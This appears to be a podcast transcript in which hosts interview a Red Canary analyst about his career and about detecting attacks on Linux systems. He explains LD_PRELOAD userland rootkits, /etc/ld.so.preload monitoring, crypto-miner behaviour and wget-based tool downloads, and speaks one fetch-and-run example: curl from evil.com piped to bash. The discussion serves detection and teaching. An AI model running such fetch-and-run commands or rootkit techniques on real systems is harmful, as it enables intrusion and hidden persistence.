Welcome back to another of Stay at Home with Detections with your host XL Detrades and
Understudy 77. Although I will say that Stay at Home probably has far few people listening because, honestly, if you're not stuck in a car, why bother?
Yeah, that is true. I think our stats have shown that a little bit too. I, just as much as everyone else, misses going outside. So hopefully things get cleared up soon.
I think we talked about this last week. I both simultaneously miss people and can't stand them right now. Largely due to an overabundance of meetings, but no actual human contact outside of my direct family. That said, hopefully tonight we'll break that curve because I think tonight is a really, really cool topic and guest.
Yeah, I'm looking forward to it. It was interesting that the company that our guest works for actually reached out to us, or one of the people who work there. So that's kind of how this got going. So this is a first for us here, and that
that's also because him and I shared a horrible experience together.
Well, I was going to say some other stuff. Let's introduce Tony from Red Canary.
How's it going?
Hi, Tony.
Hey, Tony. Now, we have an important question to start off with here, Tony.
Awesome.
Do you play Animal Crossing?
Oh, yeah. Good question.
Unfortunately, I do not, but I did see the crossover memes where Doom Eternal and Animal Crossing came out on the same day. And they had the cutest demons I've ever seen.
So, okay, fine. The second question, bonus round, Final Fantasy VII Remake.
I have never played a Final Fantasy game in my life.
Damn, man. All right, Exile, this interview is yours. I'm done.
I do Rainbow Six Siege, but hey, I'm more of a shooters guy.
Division, then?
I'll take it.
Do you play Division, then?
That was the one Tom Clancy game I skipped. I went to Rainbow Six Siege and pretty much didn't play much of anything else. And I saw the Division, and then I thought, yeah, maybe it's neat, maybe not. And then I didn't realize that we'd have the real world divisions shortly afterwards.
Exactly. And that's where I was going to go with it too, because who knew that Tom Clancy was going to be somewhat of a prophet with a video game?
I had no idea I needed to pregame before the pandemic.
Awesome. Well, thanks for coming on, Tony. And tell us a little bit about yourself.
So I work as an intelligence analyst for Red Canary. So most of the day I get to research cool things that bad guys do and figure out how to detect them. So, if particular bad guys using particular kind of malware, let's go and, bad guys and gals, it's equal opportunist. Let's figure out how to go detect them and get them out of a customer environment. So it's been awesome. When I started on a Red Canary about 2.5 years ago, I was doing more of the event triage thing. And then, before that, I was a systems administrator, did, enterprise IT for the better part of 10 years-ish. I started off as like a work study and went from unloading computers off of pallets at the beginning of the 10 years to just managing Exchange, AD, and Zen Desktop, things like that at the end of the 10 years. So it was a lot of growth, a lot of good opportunity. I've got to say, if you ever have the opportunity to go work for a college, do it for at least a couple of years, just so you understand the strife.
So that's a trial by fire, working at a college. Go through the muck is what you're saying.
Yes. The beautiful thing about college is it's a wonderful place to grow up if you're an IT pro. When you get pigeonholed into a bank or a hospital or something else.
You mean somebody that actually has budget and real security? And not a whole user base that's basically trying to thwart it all the time?
I will give you that. If there's a shared computing space in a bank, I've yet to find it. So I will give you that one. But the beautiful thing about the college is that, it gives you the opportunity to sample all of these different industries in one, where you get you have engineering classes. So you go to maintain software for, your engineering classes, QuickBooks for your accounting classes, maintenance software, ICS stuff for your buildings. So there's all sorts of different cool stuff to look at.
It also cuts your lifespan by about 20 years.
So that's only the hookers and below at college, not necessarily college itself.
There's that.
See, I just thought it was the general stress of trying to do any type of information security in education, which is a topic that we've went over several times here.
And the hilarious thing I end up telling people is like, it's amazing trying to defend a network when part of your network cannot be trusted.
That's what I'm saying, right?
Yes.
Part of your network will do anything they can to actively get past whatever you have built. And like, you can't fire them because they're the ones paying you.
Exactly. So tell you a fun story. When I was a student, we used to have software restriction policies in AD. I had no idea what they were called at the time, but that's what they were. And the folks in the computer labs figured out that if they renamed their computer games to winword.exe, they could run their games. And that's what they did day after day. So you go into the computer lab and go, what is that? Well, somebody's trying to play Counter-Strike that's renamed as WinWord.
So I taught at a middle school, and I'm sure I've told this story before, but I taught at a middle school last year and just went in as kind of a guest lecturer for one class, right, for an after-school club. And the teacher was telling me about the guy who put together this club, the kid who's in middle school, and how part of the reason why this club exists was to give him an outlet because the year prior, he was caught selling proxy access to students to get around the school firewall.
Yeah, that's awesome.
Which at that point, like, you know, you kind of want to be like, dude, like, that's a good job. But at the same time, you don't want to be like, dude, like, you got a bright future, man. Don't screw it up now.
It's one of those moments where if you're a parent, you go, we need to talk about this later. You did good.
Right?
Exactly.
The rule in my house, and my daughter's young, so I don't have to employ this rule yet. But the rule in my house is if my daughter can find a way past my security measures, she will have to have learned something. And I mean, at that point, she deserves a pat on the back, and I need to do a better job.
There's the mindset of like, hey, if they got through all of this, you know, they deserve a head start.
Right? Like that. I mean, that's kind of the rule here. Like if my kid figures out how to get past what I do for a living, then like, she really deserves that access for like a day, and then I'll make it better. And then she can try to figure out how to get through again. But I'm not going to yell at her or ground her or anything because I encourage somebody to try to break the rules a little bit. I'm not going to lie.
And I love to see kind of like the spark of understanding when folks kind of start learning their way through some of that. And I got to see some of that on the side where I used to, whenever I worked there as like a desktop tech, I used to kind of rail against faculty a little bit. And then I became a faculty member, and I realized why everything was the way it was. I realized, you know, some of the differences, like, oh yeah, here's why everybody's a little bit harebrained in this direction because I turned in that way too. And I got to teach the second half of Network Plus. I think it was HTML, CSS, Android App Inventor, like the classes I never want to teach again in my life. But the second half of Network Plus was so much fun.
That's awesome. Now, I'm curious about something with the people who were renaming, those people who are like, you know, renaming the executables to get past the software restriction policies. Mm-hmm. At the college, of the people who were doing that, how much of it was entertainment focused, meaning like music, movies, games, versus actually trying to do something else?
At that point, I was like a sophomore. So all I saw was the entertainment value. Yeah. If there was something else going on, it was below the surface. And honestly, I didn't even know to look for it at that time.
Yeah, that I asked that question because I've had this conversation with a few people about in the education space, how a lot of the kids who are trying to do that stuff are just, one, either seeing if they can, or two, trying to bypass a restriction so they can get access to something they find entertaining.
It's like everything else on the internet. It's driven by porn. I'm just saying, like, and the internet is built on porn and cats.
I got to say, if you ever want entertainment, the best entertainment I can offer you is to go look at the DNS cache of a community college and see the different domains that pop up.
To go look at the DNS cache of almost any company,
yes, is both
entertaining and horrifying, which means a community college is probably both a whole nother level of entertaining and horrifying.
And the amazing thing to me was that how much people would dare to different kinds of media. I don't want to just go to that one aspect of it, but just how much how much conduct you would reserve for somebody at home, and they would bring it to a computer lab. They would bring it to a shared computing lab and not only be like, oh yeah, I'm doing it, but like, yeah, I'm doing it proudly. And,
I believe that.
And like that sort of thing. And there were a few times we had to get campus cops to like go, hey dude, don't care what you're doing. You just can't do it here. And just leave, never come back.
Wow.
Yeah, I believe that.
Yeah.
Those were fun.
So how did you go from IT college to working at Red Canary? And before we go on to that, actually, in case some of our listeners are not familiar with what kind of company is Red Canary?
So Red Canary is a managed detection and response outfit where it used to be a startup. And now I think we're somewhere in the small business phase. But we take endpoint detection data out of things like Carbon Black, CrowdStrike, Endgame, and we feed that through an engine, slice and dice, process it, and look for interesting process behaviors. Then when we find something that's interesting, we have a human go and say yay or nay, malicious, suspicious, or just admins being weird, and issue a detection on it. And if it is evil, if it is something that definitely needs to be looked at, customer can confirm it, and we help them figure out how to get rid of it. We don't do like the full IR, like boots on the ground with you, but we'll help you every step of the way.
Awesome. So now from your college IT days to Red Canary, what does that path look like for you?
So after I finished out the bachelor's, it was just like a general IT degree sort of thing. Still working at the college, trying to figure out what I wanted to do. At that point, I knew that a career in IT, I could do that. I could go through that. And somewhere around that point, I went from a desktop tech to a junior systems admin. And what that looked like was on a Friday, the senior admin said, hey, Bruce quit. You need to decide whether you want to be a junior admin by Monday. And that was fun. So I jumped over to be a junior admin because I figured, if I said no, the opportunities would dry up. And after I'd finished the bachelor's, I was kind of trying to figure out what to do next. And something that was kind of interesting, I tried one of those US Cyber Challenge classes, experiences, whatever you want to call them. And I got hooked on memory forensics. And it was really awesome, something really cool to do. When I got back to work, I realized that it worked a lot differently in real life than in class. And I ended up deciding to do that. I wanted to do my master's on digital forensics. So I went and did a master's of digital forensics, and I graduated, did all of that. And that's when I started teaching tech on the side a little bit. I thought at the time that I wanted to do some sort of law enforcement sort of thing, some sort of digital investigations. And I didn't realize that I didn't want to do federal government at that time. I decided to go look at Department of Justice, Department of Defense. I found out after a short period that it wasn't for me.
Me too.
Me 3, ditto. And I've been there.
And the best way I can describe it is like when I've heard 2 or 3 people say that it was their misguided youth, like it offered them opportunities that they wouldn't have gotten anywhere else. But I started realizing, that's not the opportunities that I needed coming out of it.
I will admit clearance is payday, but it's not everything.
And I've heard the same thing, but I actually had a discussion with somebody today where I kind of realized, if clearances affect what you can research after you get out, sometimes it seems like clearances are more trouble than it's worth.
Oh, clearance totally can be more trouble than it's worth because of all the restrictions that get placed on you as well. But you do get to mess with some of the coolest stuff.
Oh yeah.
If you're at the right agency doing the right thing.
And that's the magic thing is like, and you don't know which agency that is until you find it.
Correct.
You don't just like stumble on that on the internet where somebody is like, oh, hey, if you want to work on the things that turn out the lights, go here. So I ended up somewhere after that. I was looking at kind of the virtual SOC sort of stuff because I knew my wife would need to move soon for a PhD program, and I thought, well, let's try to figure out something where I could work from anywhere. And I have to do the little plug where I applied to CrowdStrike, and CrowdStrike turned me down for their virtual SOC. So I said, screw it. Applying to Red Canary, and Red Canary said, yeah, come on over.
That makes you the Dave Mustaine of MSSPs and MDRs.
So CrowdStrike, you had your chance. I went to Red Canary instead, and so it's worked out fairly well since. I realized that not everybody has a lot of desktop and sysadmin experience when they get into security, and it looks so much different for an admin coming into it than somebody coming out of college.
Doesn't it in some ways like just make everything kind of make more sense? Hold on, but hold on. Before we go down that thought, I want to make one comment because I found this really interesting. So, I've spent a bit of my career working for a vendor, not CrowdStrike, but similar vendor. And I spent some of my career working for a more pure play, like the Red Canary kind of thing. There's something that's so freeing working pure play where you're tool agnostic in a lot of senses, where you actually get to play with multiple tools and build experience up that feels so much more transferable than being stuck on only one infrastructure. And I thought that would be a cool thing to talk about for a second.
I agree to an extent. Sometimes it's frustrating because you can't control the tools you're working with. So you really wish they were better sometimes.
Come on, when you work, trust me, when you work for the company, you can't control the tools either.
Oh, well, I'll give you that. That works. And one of the things that I kind of like that's awesome to me is that every now and then I'll have to do some sort of investigation support thing where Carbon Black has found X or CrowdStrike has found X and things like that. We want to figure out how to, let's make suggestions on how to make it better in the future. Usually our incident handlers have something like that. And then, if they need additional recommendations or, if somebody needs help analyzing a file or things like that, there's a lot of times when I'm not even working with those endpoint tools. I might be saying, oh yeah, from back in the day, I used to tinker with this with group policy objects. This ought to help out with that. Or me saying, oh yeah, I used to tinker with this log file. If you go and look for this evidence source in this log, you're going to find more stuff. So,
and I feel like that's where you get into that sysadmin background, which loops us right back nicely to where I cut you off.
Oh, exactly. No, it's fun seeing how much different things can go whenever you learn your fundamentals in different ways. If you learn your fundamentals in a classroom, that you have a certain outlook on life, but when you have folks that are desktop and sysadmins come in, and it feels like so much more nonchalant. Oh yeah, it's that. How do you know? Because I had a long week. And that was pretty much kind of my experience coming into it. And, I would say something like, oh, this is doing this. Well, why do you think it's this? Well, because I used to work with that. That's literally how this works. Let me take you to the manual.
I in a lot of weird ways would almost always prefer to hire from help desk as opposed to hire from college, because there's a certain in the flame of the fire kind of thing that you learn when you do something with computers versus when you theoretically learn about computers. Mm-hmm. Because I think almost anybody in infosec, especially on the defensive side, theoretical learning does not get you really far here. Everything is so different all the time. It's always out of date or updated. It's a lot of wit, and it's a lot of, this is similar to something I've done. I get so very little value out of a book, so to speak, as compared to doing something.
Well, and that's kind of one of the reasons, and SANS is not paying me to be here to say this. It's one of the reasons I kind of like some of the SANS training. Yes, it's expensive, but when you compare something like the Security Plus, I've got a Sec Plus, perfectly fine. If you don't have anything going into the industry, you need credentials to your name. But when you learn that in theory, it's an entirely different experience than going into a class and having labs and using the tools, seeing the output, seeing how to make all of it work together. And then, if you have the admin experience, you've interned somewhere, it's that times 100. Because you get to work with all sorts of enterprise technologies.
I mean, they're the gold standard for training, and they cost as much as the gold standard for training, right?
Yeah. So I really liked having that experience, and it was an excellent place to grow up. Coming over to Red Canary it was at first it was a little bit of a shock. The culture shock was a little bit odd to me because I had never worked at a startup before. All I knew was the college, and there were some aspects of it that were rather stuffy. And when I came over to Red Canary, I think what the most hilarious part to me was the college was everything for the college was dry. There was no liquor to be seen, anything like that. When I went to the first company all hands at Red Canary, and I went into the fridge and in the kitchen, I opened up the fridge and they were like, "Oh yeah, go get a drink." And there were like 3 different kinds of liquor in the fridge. That was the point where I realized, okay, I'm not in Kansas anymore. And
so what you need to do next is come to an internet company, like where I work. If you want to talk, like I come from like the vendor side where like happy hours are normal. When I went over to Verizon Media, dude, I will tell you, you want to talk about culture shock. Free breakfast and lunch every day, massage chairs everywhere, scooters to get across the building. Like the culture shock was I'm like, really? Like this is, there's just a lot of people like on a scooter.
Suddenly you realize, you feel like, is this excessive? This feels excessive.
Right?
Yeah.
But it's still cool.
I don't know if that's internet. I think that might just be certain big tech companies because Salesforce has a lot of similar stuff too. That it is pretty mind blowing. Yeah, to what you're saying, Tony, it is pretty mind blowing that when you go from that one environment to something else that's a lot more relaxed, a lot more free flowing, and you're like, is this okay if I engage?
Yeah, like is this a trick? Is it a trap? But, no, exactly. It was fun, and shortly after that, I found my Canary family, and it's been good ever since. And it's been a lot of good experience because they've essentially put me in front of loads and loads of endpoints in just about any industry that I can imagine, with the exception of 1 or 2, and say, go hunt for evil things. And I get to do that. I get to see what bad guys are doing, hands on keyboard in some cases. Some cases, we get to see, really cool incident responses.
As long as they didn't tell you go forth and find badness, then we're still cool with Red Canary. But if they use those words, not cool, man.
Well, it wasn't precisely those words. It was more of an implied, like, have fun, good hunting.
To be honest, we're newer than them, so like if they used it first, like we're the ones ripping them off by accident. So like I can't really be mad anyway. But
then
I did
again,
feel like
they
I
would
needed
have
to
only
make the
said
joke.
it in company meetings and not out in a public forum.
True,
Wait,
but I still felt like I needed to make the joke because you were like, "Go out, find evil," and our tagline is "Go forth, find badness."
Oh no, yeah.
Sorry, good time for a joke.
I'm sitting here thinking, like, crap, do I got to call a copyright lawyer? Like, what happened?
No, dude, you're good.
No,
We are not anywhere near that serious anyway.
No worries. Yeah, no, it's been good ever since. And then after a short period, I worked through events. Like, we have lots of detection engineers that there are some that are really interested in doing events. There are some that are interested in learning more about how incidents work. There are some that are really interested in engineering. And the really cool thing about working here is that they figure out ways to help stoke what you're interested in. And if you don't know what you're interested in, they'll help you find it. And so I got to tinker a little bit more with the engineering detection stuff, going more towards detection use cases analytics. And then as it went, I got a lot more interested in threat research, a lot more into intelligence sort of things. I got interested in kind of making recommendations and figuring out how things worked, but I didn't want to talk to customers as much as the incident handlers had to. So I said, maybe IH isn't a fit. And then one of the VPs said, "Hey, we're doing this intelligence thing. You want to join in?" Sure, why not? And do I get to tinker with things and teach and detect? Yeah, you get to do all those things. Okay, sweet. I'm good.
Nice. So did you, sounds like they helped you find an area, but is there a specific portion that you focused on? Like, I assume that there's a big difference between Windows and Linux and Mac OS on your endpoints there. The majority in Windows, like, did you find something in that realm of where you went with Red Canary that you really pulled out your passion?
So a little bit. So most folks that we talk to on the detection engineering side, incident handlers, pretty much everybody that joins in, is everybody really has one or two systems that they're really, really adept at. And mostly it's Windows and some a little Mac. Well, some a little Mac, some a little Linux, but there are very few people that we've hired in who have been former Unix admins, Linux admins, things like that. One of the things I used to work on at the college was a student information system. And we started off with Solaris and logical domains on Solaris. And the way my senior admin put it was containers before they were cool. And so, yeah, we had some fun with that. And then we had to go to Red Hat. And so I ended up going from Solaris to Red Hat and figuring out how a lot of this stuff worked. Not really the school of hard knocks. Like, there was documentation, don't get me wrong, but I was still kind of making things up as I went and realizing how things worked. And then when I got over into Red Canary, we started looking at more of the Windows stuff is fairly covered. Let's figure out Mac OS and Linux a little bit more. And I floated over more towards the Unixy side of the house. I'm part of the 1% of the world still waiting for the year of the Linux desktop. So I use Linux at home. I use stuff like that. I've lived in that environment for a very long time. So I was kind of more drawn to that. And at some point, I think it was Joe, one of the VPs, Joe, basically said, hey, we want to make Linux detection better. So do whatever you can to make Linux detection better. So that kicked off a very long segment of my time at Red Canary, where I started feeling out, what are the threats that exist? How do we detect them? And how do we get towards them better?
Wow, that's really interesting. What are some of the, I don't know, I think there would be some like unique challenges in writing Linux detections over like the majority of Windows systems. Like, what were some of the unique challenges that you encountered in doing this?
So where do you want to start? Like the gathering data part or the detections part?
You pick. Dealer's choice.
All right, sweet. So let's start at the bottom of the stack. So like the biggest challenge is at the bottom of the stack. Let's say just getting data in. Most of the tools seem to scare people. When you have tools like Carbon Black, CrowdStrike, some of those, they'll have kernel modules that you have to install. And that's just part of doing business. On Windows, people are very used to doing services and drivers. Your printer requires a driver. So, what the hey, you have to put in a driver for Carbon Black. That's not going to affect anything. But when you have like entire elastic farms of Linux systems, or when you have like mission critical stuff running, SAP or, whatever Oracle middleware stuff you have, people get really finicky about putting kernel modules on them. And whenever you upgrade between versions, there's no guarantee the kernel modules, or the Linux kernel itself will still support those modules. Things like that. Like, people get kind of scared about that. So people tend to compromise and try to get different kinds of data in and out. So some of the newer vendors or some of the newer tools will start going after user space monitoring, where they don't have to have kernel modules. They use, eBPF, or part of the audit subsystem that's built into the kernel. And it has different visibilities, different things that, goods and bads that are different from kernel modules, but it's a lot more stable. It scares people less. So that's the biggest challenge, is like trying to get tools into place where people can actually go to monitor for bad things, where people can actually bring the data in. I'm sorry, I got to mute real quick. All right. So, and then on the, the detection side of life, people are a lot more familiar with Windows utilities, Windows command lines, than they are Linux command lines most of the time. there are some kind of weird arcane things that can happen on Unix type systems. And there's a whole lot of piping. There's a whole lot of input redirection. And that appears differently with endpoint tools than you would think it does. A good example of this is when you start looking for things that are like curling scripts and passing those in a pipe to a bash shell. That looks really straightforward and really simple on the command line. You curl https evil.com/script pipe to bash. When you start looking at that with an endpoint technology, that is really split out into two commands. You see curl evil.com/script, and then you see a bash process. And your script executes in your bash process, but you have no command line to tell you that, hey, there was a script here. And you have to figure out, what has gone on based on a little bit of temporal analysis, figuring out what had happened at the same time, child processes, and then some commands, aren't going to be visible in endpoint stuff at all. Like, depending on how you echo text and how you touch files, that may not be visible in an endpoint platform. So it's a lot more to kind of get used to. And if you started out in a Windows environment, there are some concepts that you almost have to relearn.
It's really interesting because I'm actually, so like to use, I'm more familiar with Nix on a command line perspective, but to hunt and like do things like that, I'm way more familiar like looking at Windows logs and like Windows command line from a detection perspective.
Oh yeah. The artifacts are, a lot more of the artifacts on the Linux side, the Unix side are file based. So, you can go and hunt for cron tabs and do things like that. But on the Windows side, you can more easily hunt for scheduled tasks on the command line. But if you're looking for cron tabs that are being set, that's not going to be something you're going to see on process command lines that easily. That's something that you have to process files to be able to reliably detect. So it's really a lot different than trying to do endpoint detection on Windows. When you do the endpoint detection on Windows, maybe you have like fileless malware, fileless stuff that happens. It stores on the Windows registry. It stores on the command line, something like that, and some sort of
memory malware too.
Yeah, memory malware, stuff like that. But on the Linux side, you can have some in-memory stuff, but more often than not, when you're getting a data center like a web server that's getting popped, there's going to be an immediate exploit where you have really quick succession of things where a web app gets popped. Immediately there's a curl or a wget to pull down tools, and then immediately execute, and maybe it deletes itself afterwards. But just piecing together that chain of events can get really difficult.
Yeah, and I definitely hear you there. Now, with some of the stuff that you were mentioning about like how it broke up, how the endpoint detection on a Nix system would break up the pipe into two separate commands. How did you go about? I mean, you threw some stuff like temporal analysis and stuff, but could you expand a little bit more on the detection methodology that you would use to find this stuff for people who are maybe used to a Windows system, on how to put that stuff together?
So we've tried a few different ways. We tried looking for, shells that have certain combinations of processes, like maybe just a shell that has a curl and a bash child process, something like that. Sometimes that works, sometimes it doesn't. Sometimes we can simply look for a bash-c command that has curl and another command shell within it, because sometimes bad guys will actually, they'll have mercy on us and issue a single command that has all that built into the command. And if it's wrapped in a bash-c, we can see all of it. So it's kind of like what you would see on Windows, where somebody does a command/c and then you have like the full thing in quotes after it. So sometimes we'll see that, and, folks have mercy on us. Outside of that, it's been looking for kind of attacker tells, little things that attackers will do that they don't realize they're doing sometimes. Good example of this is like with opportunistic crypto mining scripts. one thing that almost every crypto miner script that's in the wild will do, they'll try to kill all the competition, all the competing miners. So they'll issue just tons and tons of p-kill commands and kill commands to clean up everything else on the system before they deploy their miner. And we found out that, we can detect on a couple of these p-kill commands and potentially catch crypto miner scripts.
Wow, that's good there. And I had another question and I just lost it. So let me try to come back out.
The train of thought derailed.
Exactly.
Could you say it was next? Yeah, I'm a dad. Okay. It's a thing.
Quarantine's getting you too, huh?
Oh, God, yeah.
Yeah, we're going to have to start a weekly understudy dad joke on the podcast until
There you
we
go.
get it going, because it's two recordings in a row now.
Is it? I don't remember the last one.
Yeah, anyway, so
But I'm sure you're right.
Is gone, so I'll just move on. With
So,
Red Canary.
Continuing. Go ahead.
Yeah. I was just going to say, so something that I've liked about Red Canary as a company is the sort of open source stuff that they produce and give back out to the community. Now, is there any of the projects that Red Canary has out there that you have worked on or are currently working on?
So I'm technically listed as one of the maintainers of Atomic Red Team. It's been a minute since I've submitted a test, but I've done a decent amount of like the Linux side of the test, where I realized at some point that I got bored. I had spare time, and I thought, it'd be nice if, Atomic Red Team had a little bit more Linux love in it. And since then, it has really grown with some really awesome people contributing a lot more tests. Whenever I was doing some of the tests, it would be something like, oh yeah, this is really easy to do in Linux. Why hasn't somebody already submitted a test? Go submit the test. Done. And then, later on, other folks have kind of gotten involved. One is one of the newer maintainers, Carrie. Like her and some of her coworkers have really taken it to the next level of making it a lot more reliable, making it a lot more a lot easier to get into with execution frameworks. Like nowadays, it's platform independent, just using PowerShell. Like her and some of her coworkers found out how they could use PowerShell core to make it platform independent. So if you want to run your Linux test, you can just have to have that PowerShell core dependency. Then you can go run tests to your heart's content.
Nice. So real quick, in case some of our listeners are not familiar with Atomic Red Team, what is Atomic Red Team?
So Atomic Red Team is, personally, I think it's an awesome project where if you don't really know how adversaries behave, how they operate, you can go and learn about it. And you can see how adversaries work and replicate that in your environment. It's separated out by MITRE attack techniques. So let's say you get really, really curious one day about, remote file copies, or you get really curious about some PowerShell things or credential access, like how does an adversary dump ntds.dit? You can go and look for credential dumping in the attack framework, get that number, and go over to Atomic Red Team and look through until you find a test that says ntds util, and go and see, all right, here's how a bad guy like on the command line can go and dump ntds.dit right now. And it's pretty much how they operate in the real world. And if you want, you can automate some of these tests to make it to where, you're testing your own detection capabilities. But if even before you get to that stage, you can just go there manually and look through the test to learn about them.
Yeah, absolutely. And I know, what was it, within the past year, I don't remember how many months ago it was, the Atomic Red Team had the ELF packages for Nix systems so that you could run the tests locally that way. Did you have anything to do with that, or was that
the chain reactor stuff?
Yeah, chain reactor. That's the
chain
name
reactor.
Of it, yeah.
So that was a different team at Red Canary. That was Joran and Carl and some of the other folks at Red Canary were on a product team. They were running into some specific ways that they wanted to test Linux systems.
Mm-hmm.
And they found sometimes for some purposes, some of the Linux tests just didn't fit their needs, or some of them left, something that was a little bit harder to clean up, and they wanted a portable package where they could say, I just want to execute these things and give this binary to a customer or a prospect and say, go run this and see what your detections do. And it was a quick and easy way to basically do a chain reaction, just a random binary that would run these adversary techniques without having to learn how to script, without having to learn all of it work together. You just plug and play the commands.
And the thing that I liked about it too is some of the bigger networks that I've worked with had some Nix systems that were pretty buried inside, behind many different appliances, and didn't necessarily, for many different reasons, have as much like network scanning. Mm-hmm. But that was another way that they could still do assessments on those systems while being separated off the network from maybe where like the assessors were sitting.
No, Jordan and crew will love to hear that. They're always looking for good chain reactor stories.
Yeah. Awesome. So we're coming up to, I think, the fun part of our podcast here, the actual detection. Because you shared a lot of really good information with us, and now we're kind of leading into something specific. So we do this with every episode that we put out. It's where we get our name from, Tony. And we let our guests share a specific detection so that people who are listening can put something to work at work right away. Did you have something in mind?
Feel free to share more than one if you want, because they're useful to me too.
So when we're talking detections, are we talking just like analytics or like an attack front to end here?
Analytics for the most part, right. But we can talk through the attack too as we go. But largely if we have this front to end attack, at what point can we put in an analytic that will catch that? And what does that analytic look like?
So one of my particular bends on the Linux side, everybody has a technique or a tactic that they're fond of, that they just obsessively go after. And mine is LD preload on Linux, because I got really fascinated with this technique. It's a 20+ year old feature of glibc on Windows, and it lets you inject, it lets you hook code and substitute your own code for whatever you've hooked. And it doesn't require administrative permissions. You don't have to have root. It could be any user on the system. You just have to have code execution to use it. And if you want to, kind of look for some of that in your environment, there's a couple of different ways that you can do it. Like if you have OS query, if you have some tools like that expose environment variables, you can go and search for LD preload in the environment variables and see if it's being used used to do different things. And the way adversaries will usually use this is they'll use it for something called user space rootkits. There's been a few in the past, like I think it's Azazel. I think WinNTI had a component that was LD preload for a while. There's one project that's still being used by adversaries called libprocesshider. You can find new payloads with libprocesshider on VT every day, and crypto miner payloads will use these to hide their miner processes. And if you go and run PS on the command line, you can't find them. You have to be able to do some more difficult digging to be able to find the malicious processes. So they'll kind of substitute their own reality to hide things. And when you start looking through the environment variables, you'll eventually find them. But some adversaries, when they get to a root account, they'll decide to make it a little bit more persistent. And to make it more persistent, they manipulate one file called, it's under the etc folder, and it's ld.so.preload. That file is either not present or empty by default. The only time it's ever legitimately used is for, some sort of security monitoring or performance monitoring. And your admins are going to know what tools they need in there because they've been expressly told to go do this. So you can pretty much use modification of that file as a high fidelity detector, high fidelity analytic to tell you that an adversary has had root access to a system and they're trying to do something they shouldn't be.
And so I'm curious specifically, and dude, that's a really good one too. But I'm genuinely curious. So like, are any other, right? Any other like just comments or notes of like interesting things that you've seen or interesting ways that you've seen attackers go after Linux? Because that's always interesting to me. Like what's happening in the world today?
So when we look at kind of the difference in how Linux systems are attacked from Windows, on the Windows side of life and on Mac, and Mac even has kind of a different profile, but on Windows systems, you're more likely to get popped via either phishing or an exploit kit. Windows, more likely than not, if it's not an infrastructure system, you're going to get popped by some sort of user interaction event. On Linux systems, there's not a whole lot of user interaction in most enterprises. These are going to be data center systems, enterprise infrastructure, and that profile looks a lot different. Usually there are web applications running on a system. Sometimes our bad guy will exploit a web application and get in that way. Sometimes they'll do SSH brute forces.
I mean, Apache was super popular with the crypto miner scene, right?
Oh yeah, the strut stuff. And
yep,
like
all that
logic.
strut stuff. So popular in the crypto miner thing, which I've made the joke so many times when I did IR that like a crypto miner is theoretically and realistically the best breach or infection you can have because it's not really hurting you other than like your electricity bill.
Yeah. Yeah, it's one of those things like where you figure out you have a problem because ants get into the kitchen and now you know that there's something there, you just have to get them all out.
Exactly. Like, but they're not doing any real damage. So like if you have crypto miners, folks, fix it, but it could be way worse.
And there was even one crypto miner campaign, I can't remember which one it was, that had something like that written into their shell scripts of basically saying, we're just here to mine, dude. We don't want anything else. And by the way, however we got in, you should patch that.
Right.
And that was kind of the hilarious thing to look at. But yeah, so there's a little bit more of that. And of course, on IoT side of life, I kind of joke of like IoT devices with Linux, they're pretty much going to be the same as your profile is going to be pretty much the same as a data center enterprise Linux device. It's just extremely smaller scale. Because when we think about it, you have an enterprise Linux system that's running SAP or, whatever. It's going to be running a web server. It's going to have a web app on it. Your IoT device, it's running a web server, has a web app on it. That web app may be crappier. The web server may be smaller, but and this IoT device doesn't have two power supplies and a RAID array backing it up. That's the only difference.
True that. And then, so I have one other question before we close. We usually end with the detection, but I do have one question that I think people will be really excited that I'm going to ask.
Oh boy.
What suggestions do you have for people who are looking to get more information on like finding badness in Nix? Like how do people up their skill level to be able to do this stuff? Like what do they read? What talks should they watch? Whatever direction that goes. Like what's your suggestion for people on that?
So my biggest suggestions, besides reading the Red Canary blog, is to go
good plug.
Yeah, thank you. I write there occasionally, so I got to keep the living going. But to look at IoT breaches, not everybody writes about their specific data center breaches, what's gone wrong on their Unix systems in a data center, their mission critical stuff. But everybody and their brother has had a DVR that's gone bad. Everybody and their brother has had a camera that had a web server on it that went bad. And they write about them nonstop. Since a lot of these systems are basically just stripped down Linux, you can use the same techniques, the same things that have happened, and scale them up, and you have some ready-made things to look for on the rest of your Linux systems. So when Mirai or whatever else decides that they don't want to play with ARM processors anymore, they want to go after, big game with x86 and 64, you're already ready for them. You understand how the techniques work.
God, that's not at all where I thought you were going to go, but that's such cool advice.
Where'd you think it was going to go?
I don't know, but like, that's awesome. And it's just not what I would have expected, but it's awesome. I love hearing somebody say something that I wouldn't have expected.
And the other one is become very, very familiar with man pages. If you're not used to living in Linux, if you're on a Linux command line or even on Mac OS command line, any sort of Unixy flavored OS, you're going to have a man command where you can type in man curl or man wget. Become very familiar and don't get shy about typing in man, whatever the command is, to look for the manual page. Everybody starts somewhere. It is not an admission of shame or guilt that you have to look at the manual page. Just do it.
Things like wget actually can be really interesting to look for too, because if somebody happens to pop a shell on your Linux server,
exactly,
one of the first things they might do is hit something like wget to pull down some additional tooling for them. So if it's not common in your environment, which to be honest, in a lot of places, it's not that common to run wget on your server infrastructure, it can be a really cool thing to look for.
And it's interesting seeing how different organizations use those little tools too. Like, we've run into some like elastic, huge web app organizations that will use curl post requests in their customized web apps to like do information transmissions back and forth. So we have to figure out how do we tune things for this one organization and make sure that we're catching in on the evil stuff and not just the blanket of good stuff. We've
said this 100 times, folks. Scope your environment and understand what is normal. Exactly. That is what will make you good at what you do, knowing what is normal.
Precisely.
So I think that about brings us in. Exiled, any last statements before I take us out?
Thanks for joining us, Tony. That was very informative, and I'm still taking notes from what you were saying. So, it was awesome.
You can tell, like, all those little breaks where he was like, "Oh, I got to go ahead on mute and talk now." Like he was taking notes.
Yeah, I'm not going to lie. Like I'm talking so fast, I have to like stop and take breaths because this honestly excites me to some extent. Like my wife is tired of hearing it.
Well, you at least had a couple people and all of our listeners that are just excited to hear about you talk about it.
And two hosts who are just as excited, if not more, than most of our listeners.
Exactly.
But on that note, I mean, we will post a link to the Red Canary blog. We will post a link to your Twitter and where people can find you in the show description. Thanks so much for coming on. It was really, really great. Thanks to, Brian for syncing us up and kind of putting this all together, and Red Canary for letting you come chat with us. On that note, I'm going to lead out with our tagline, capital hour. All right, that's enough of that. Go forth and find badness. Good night, everybody.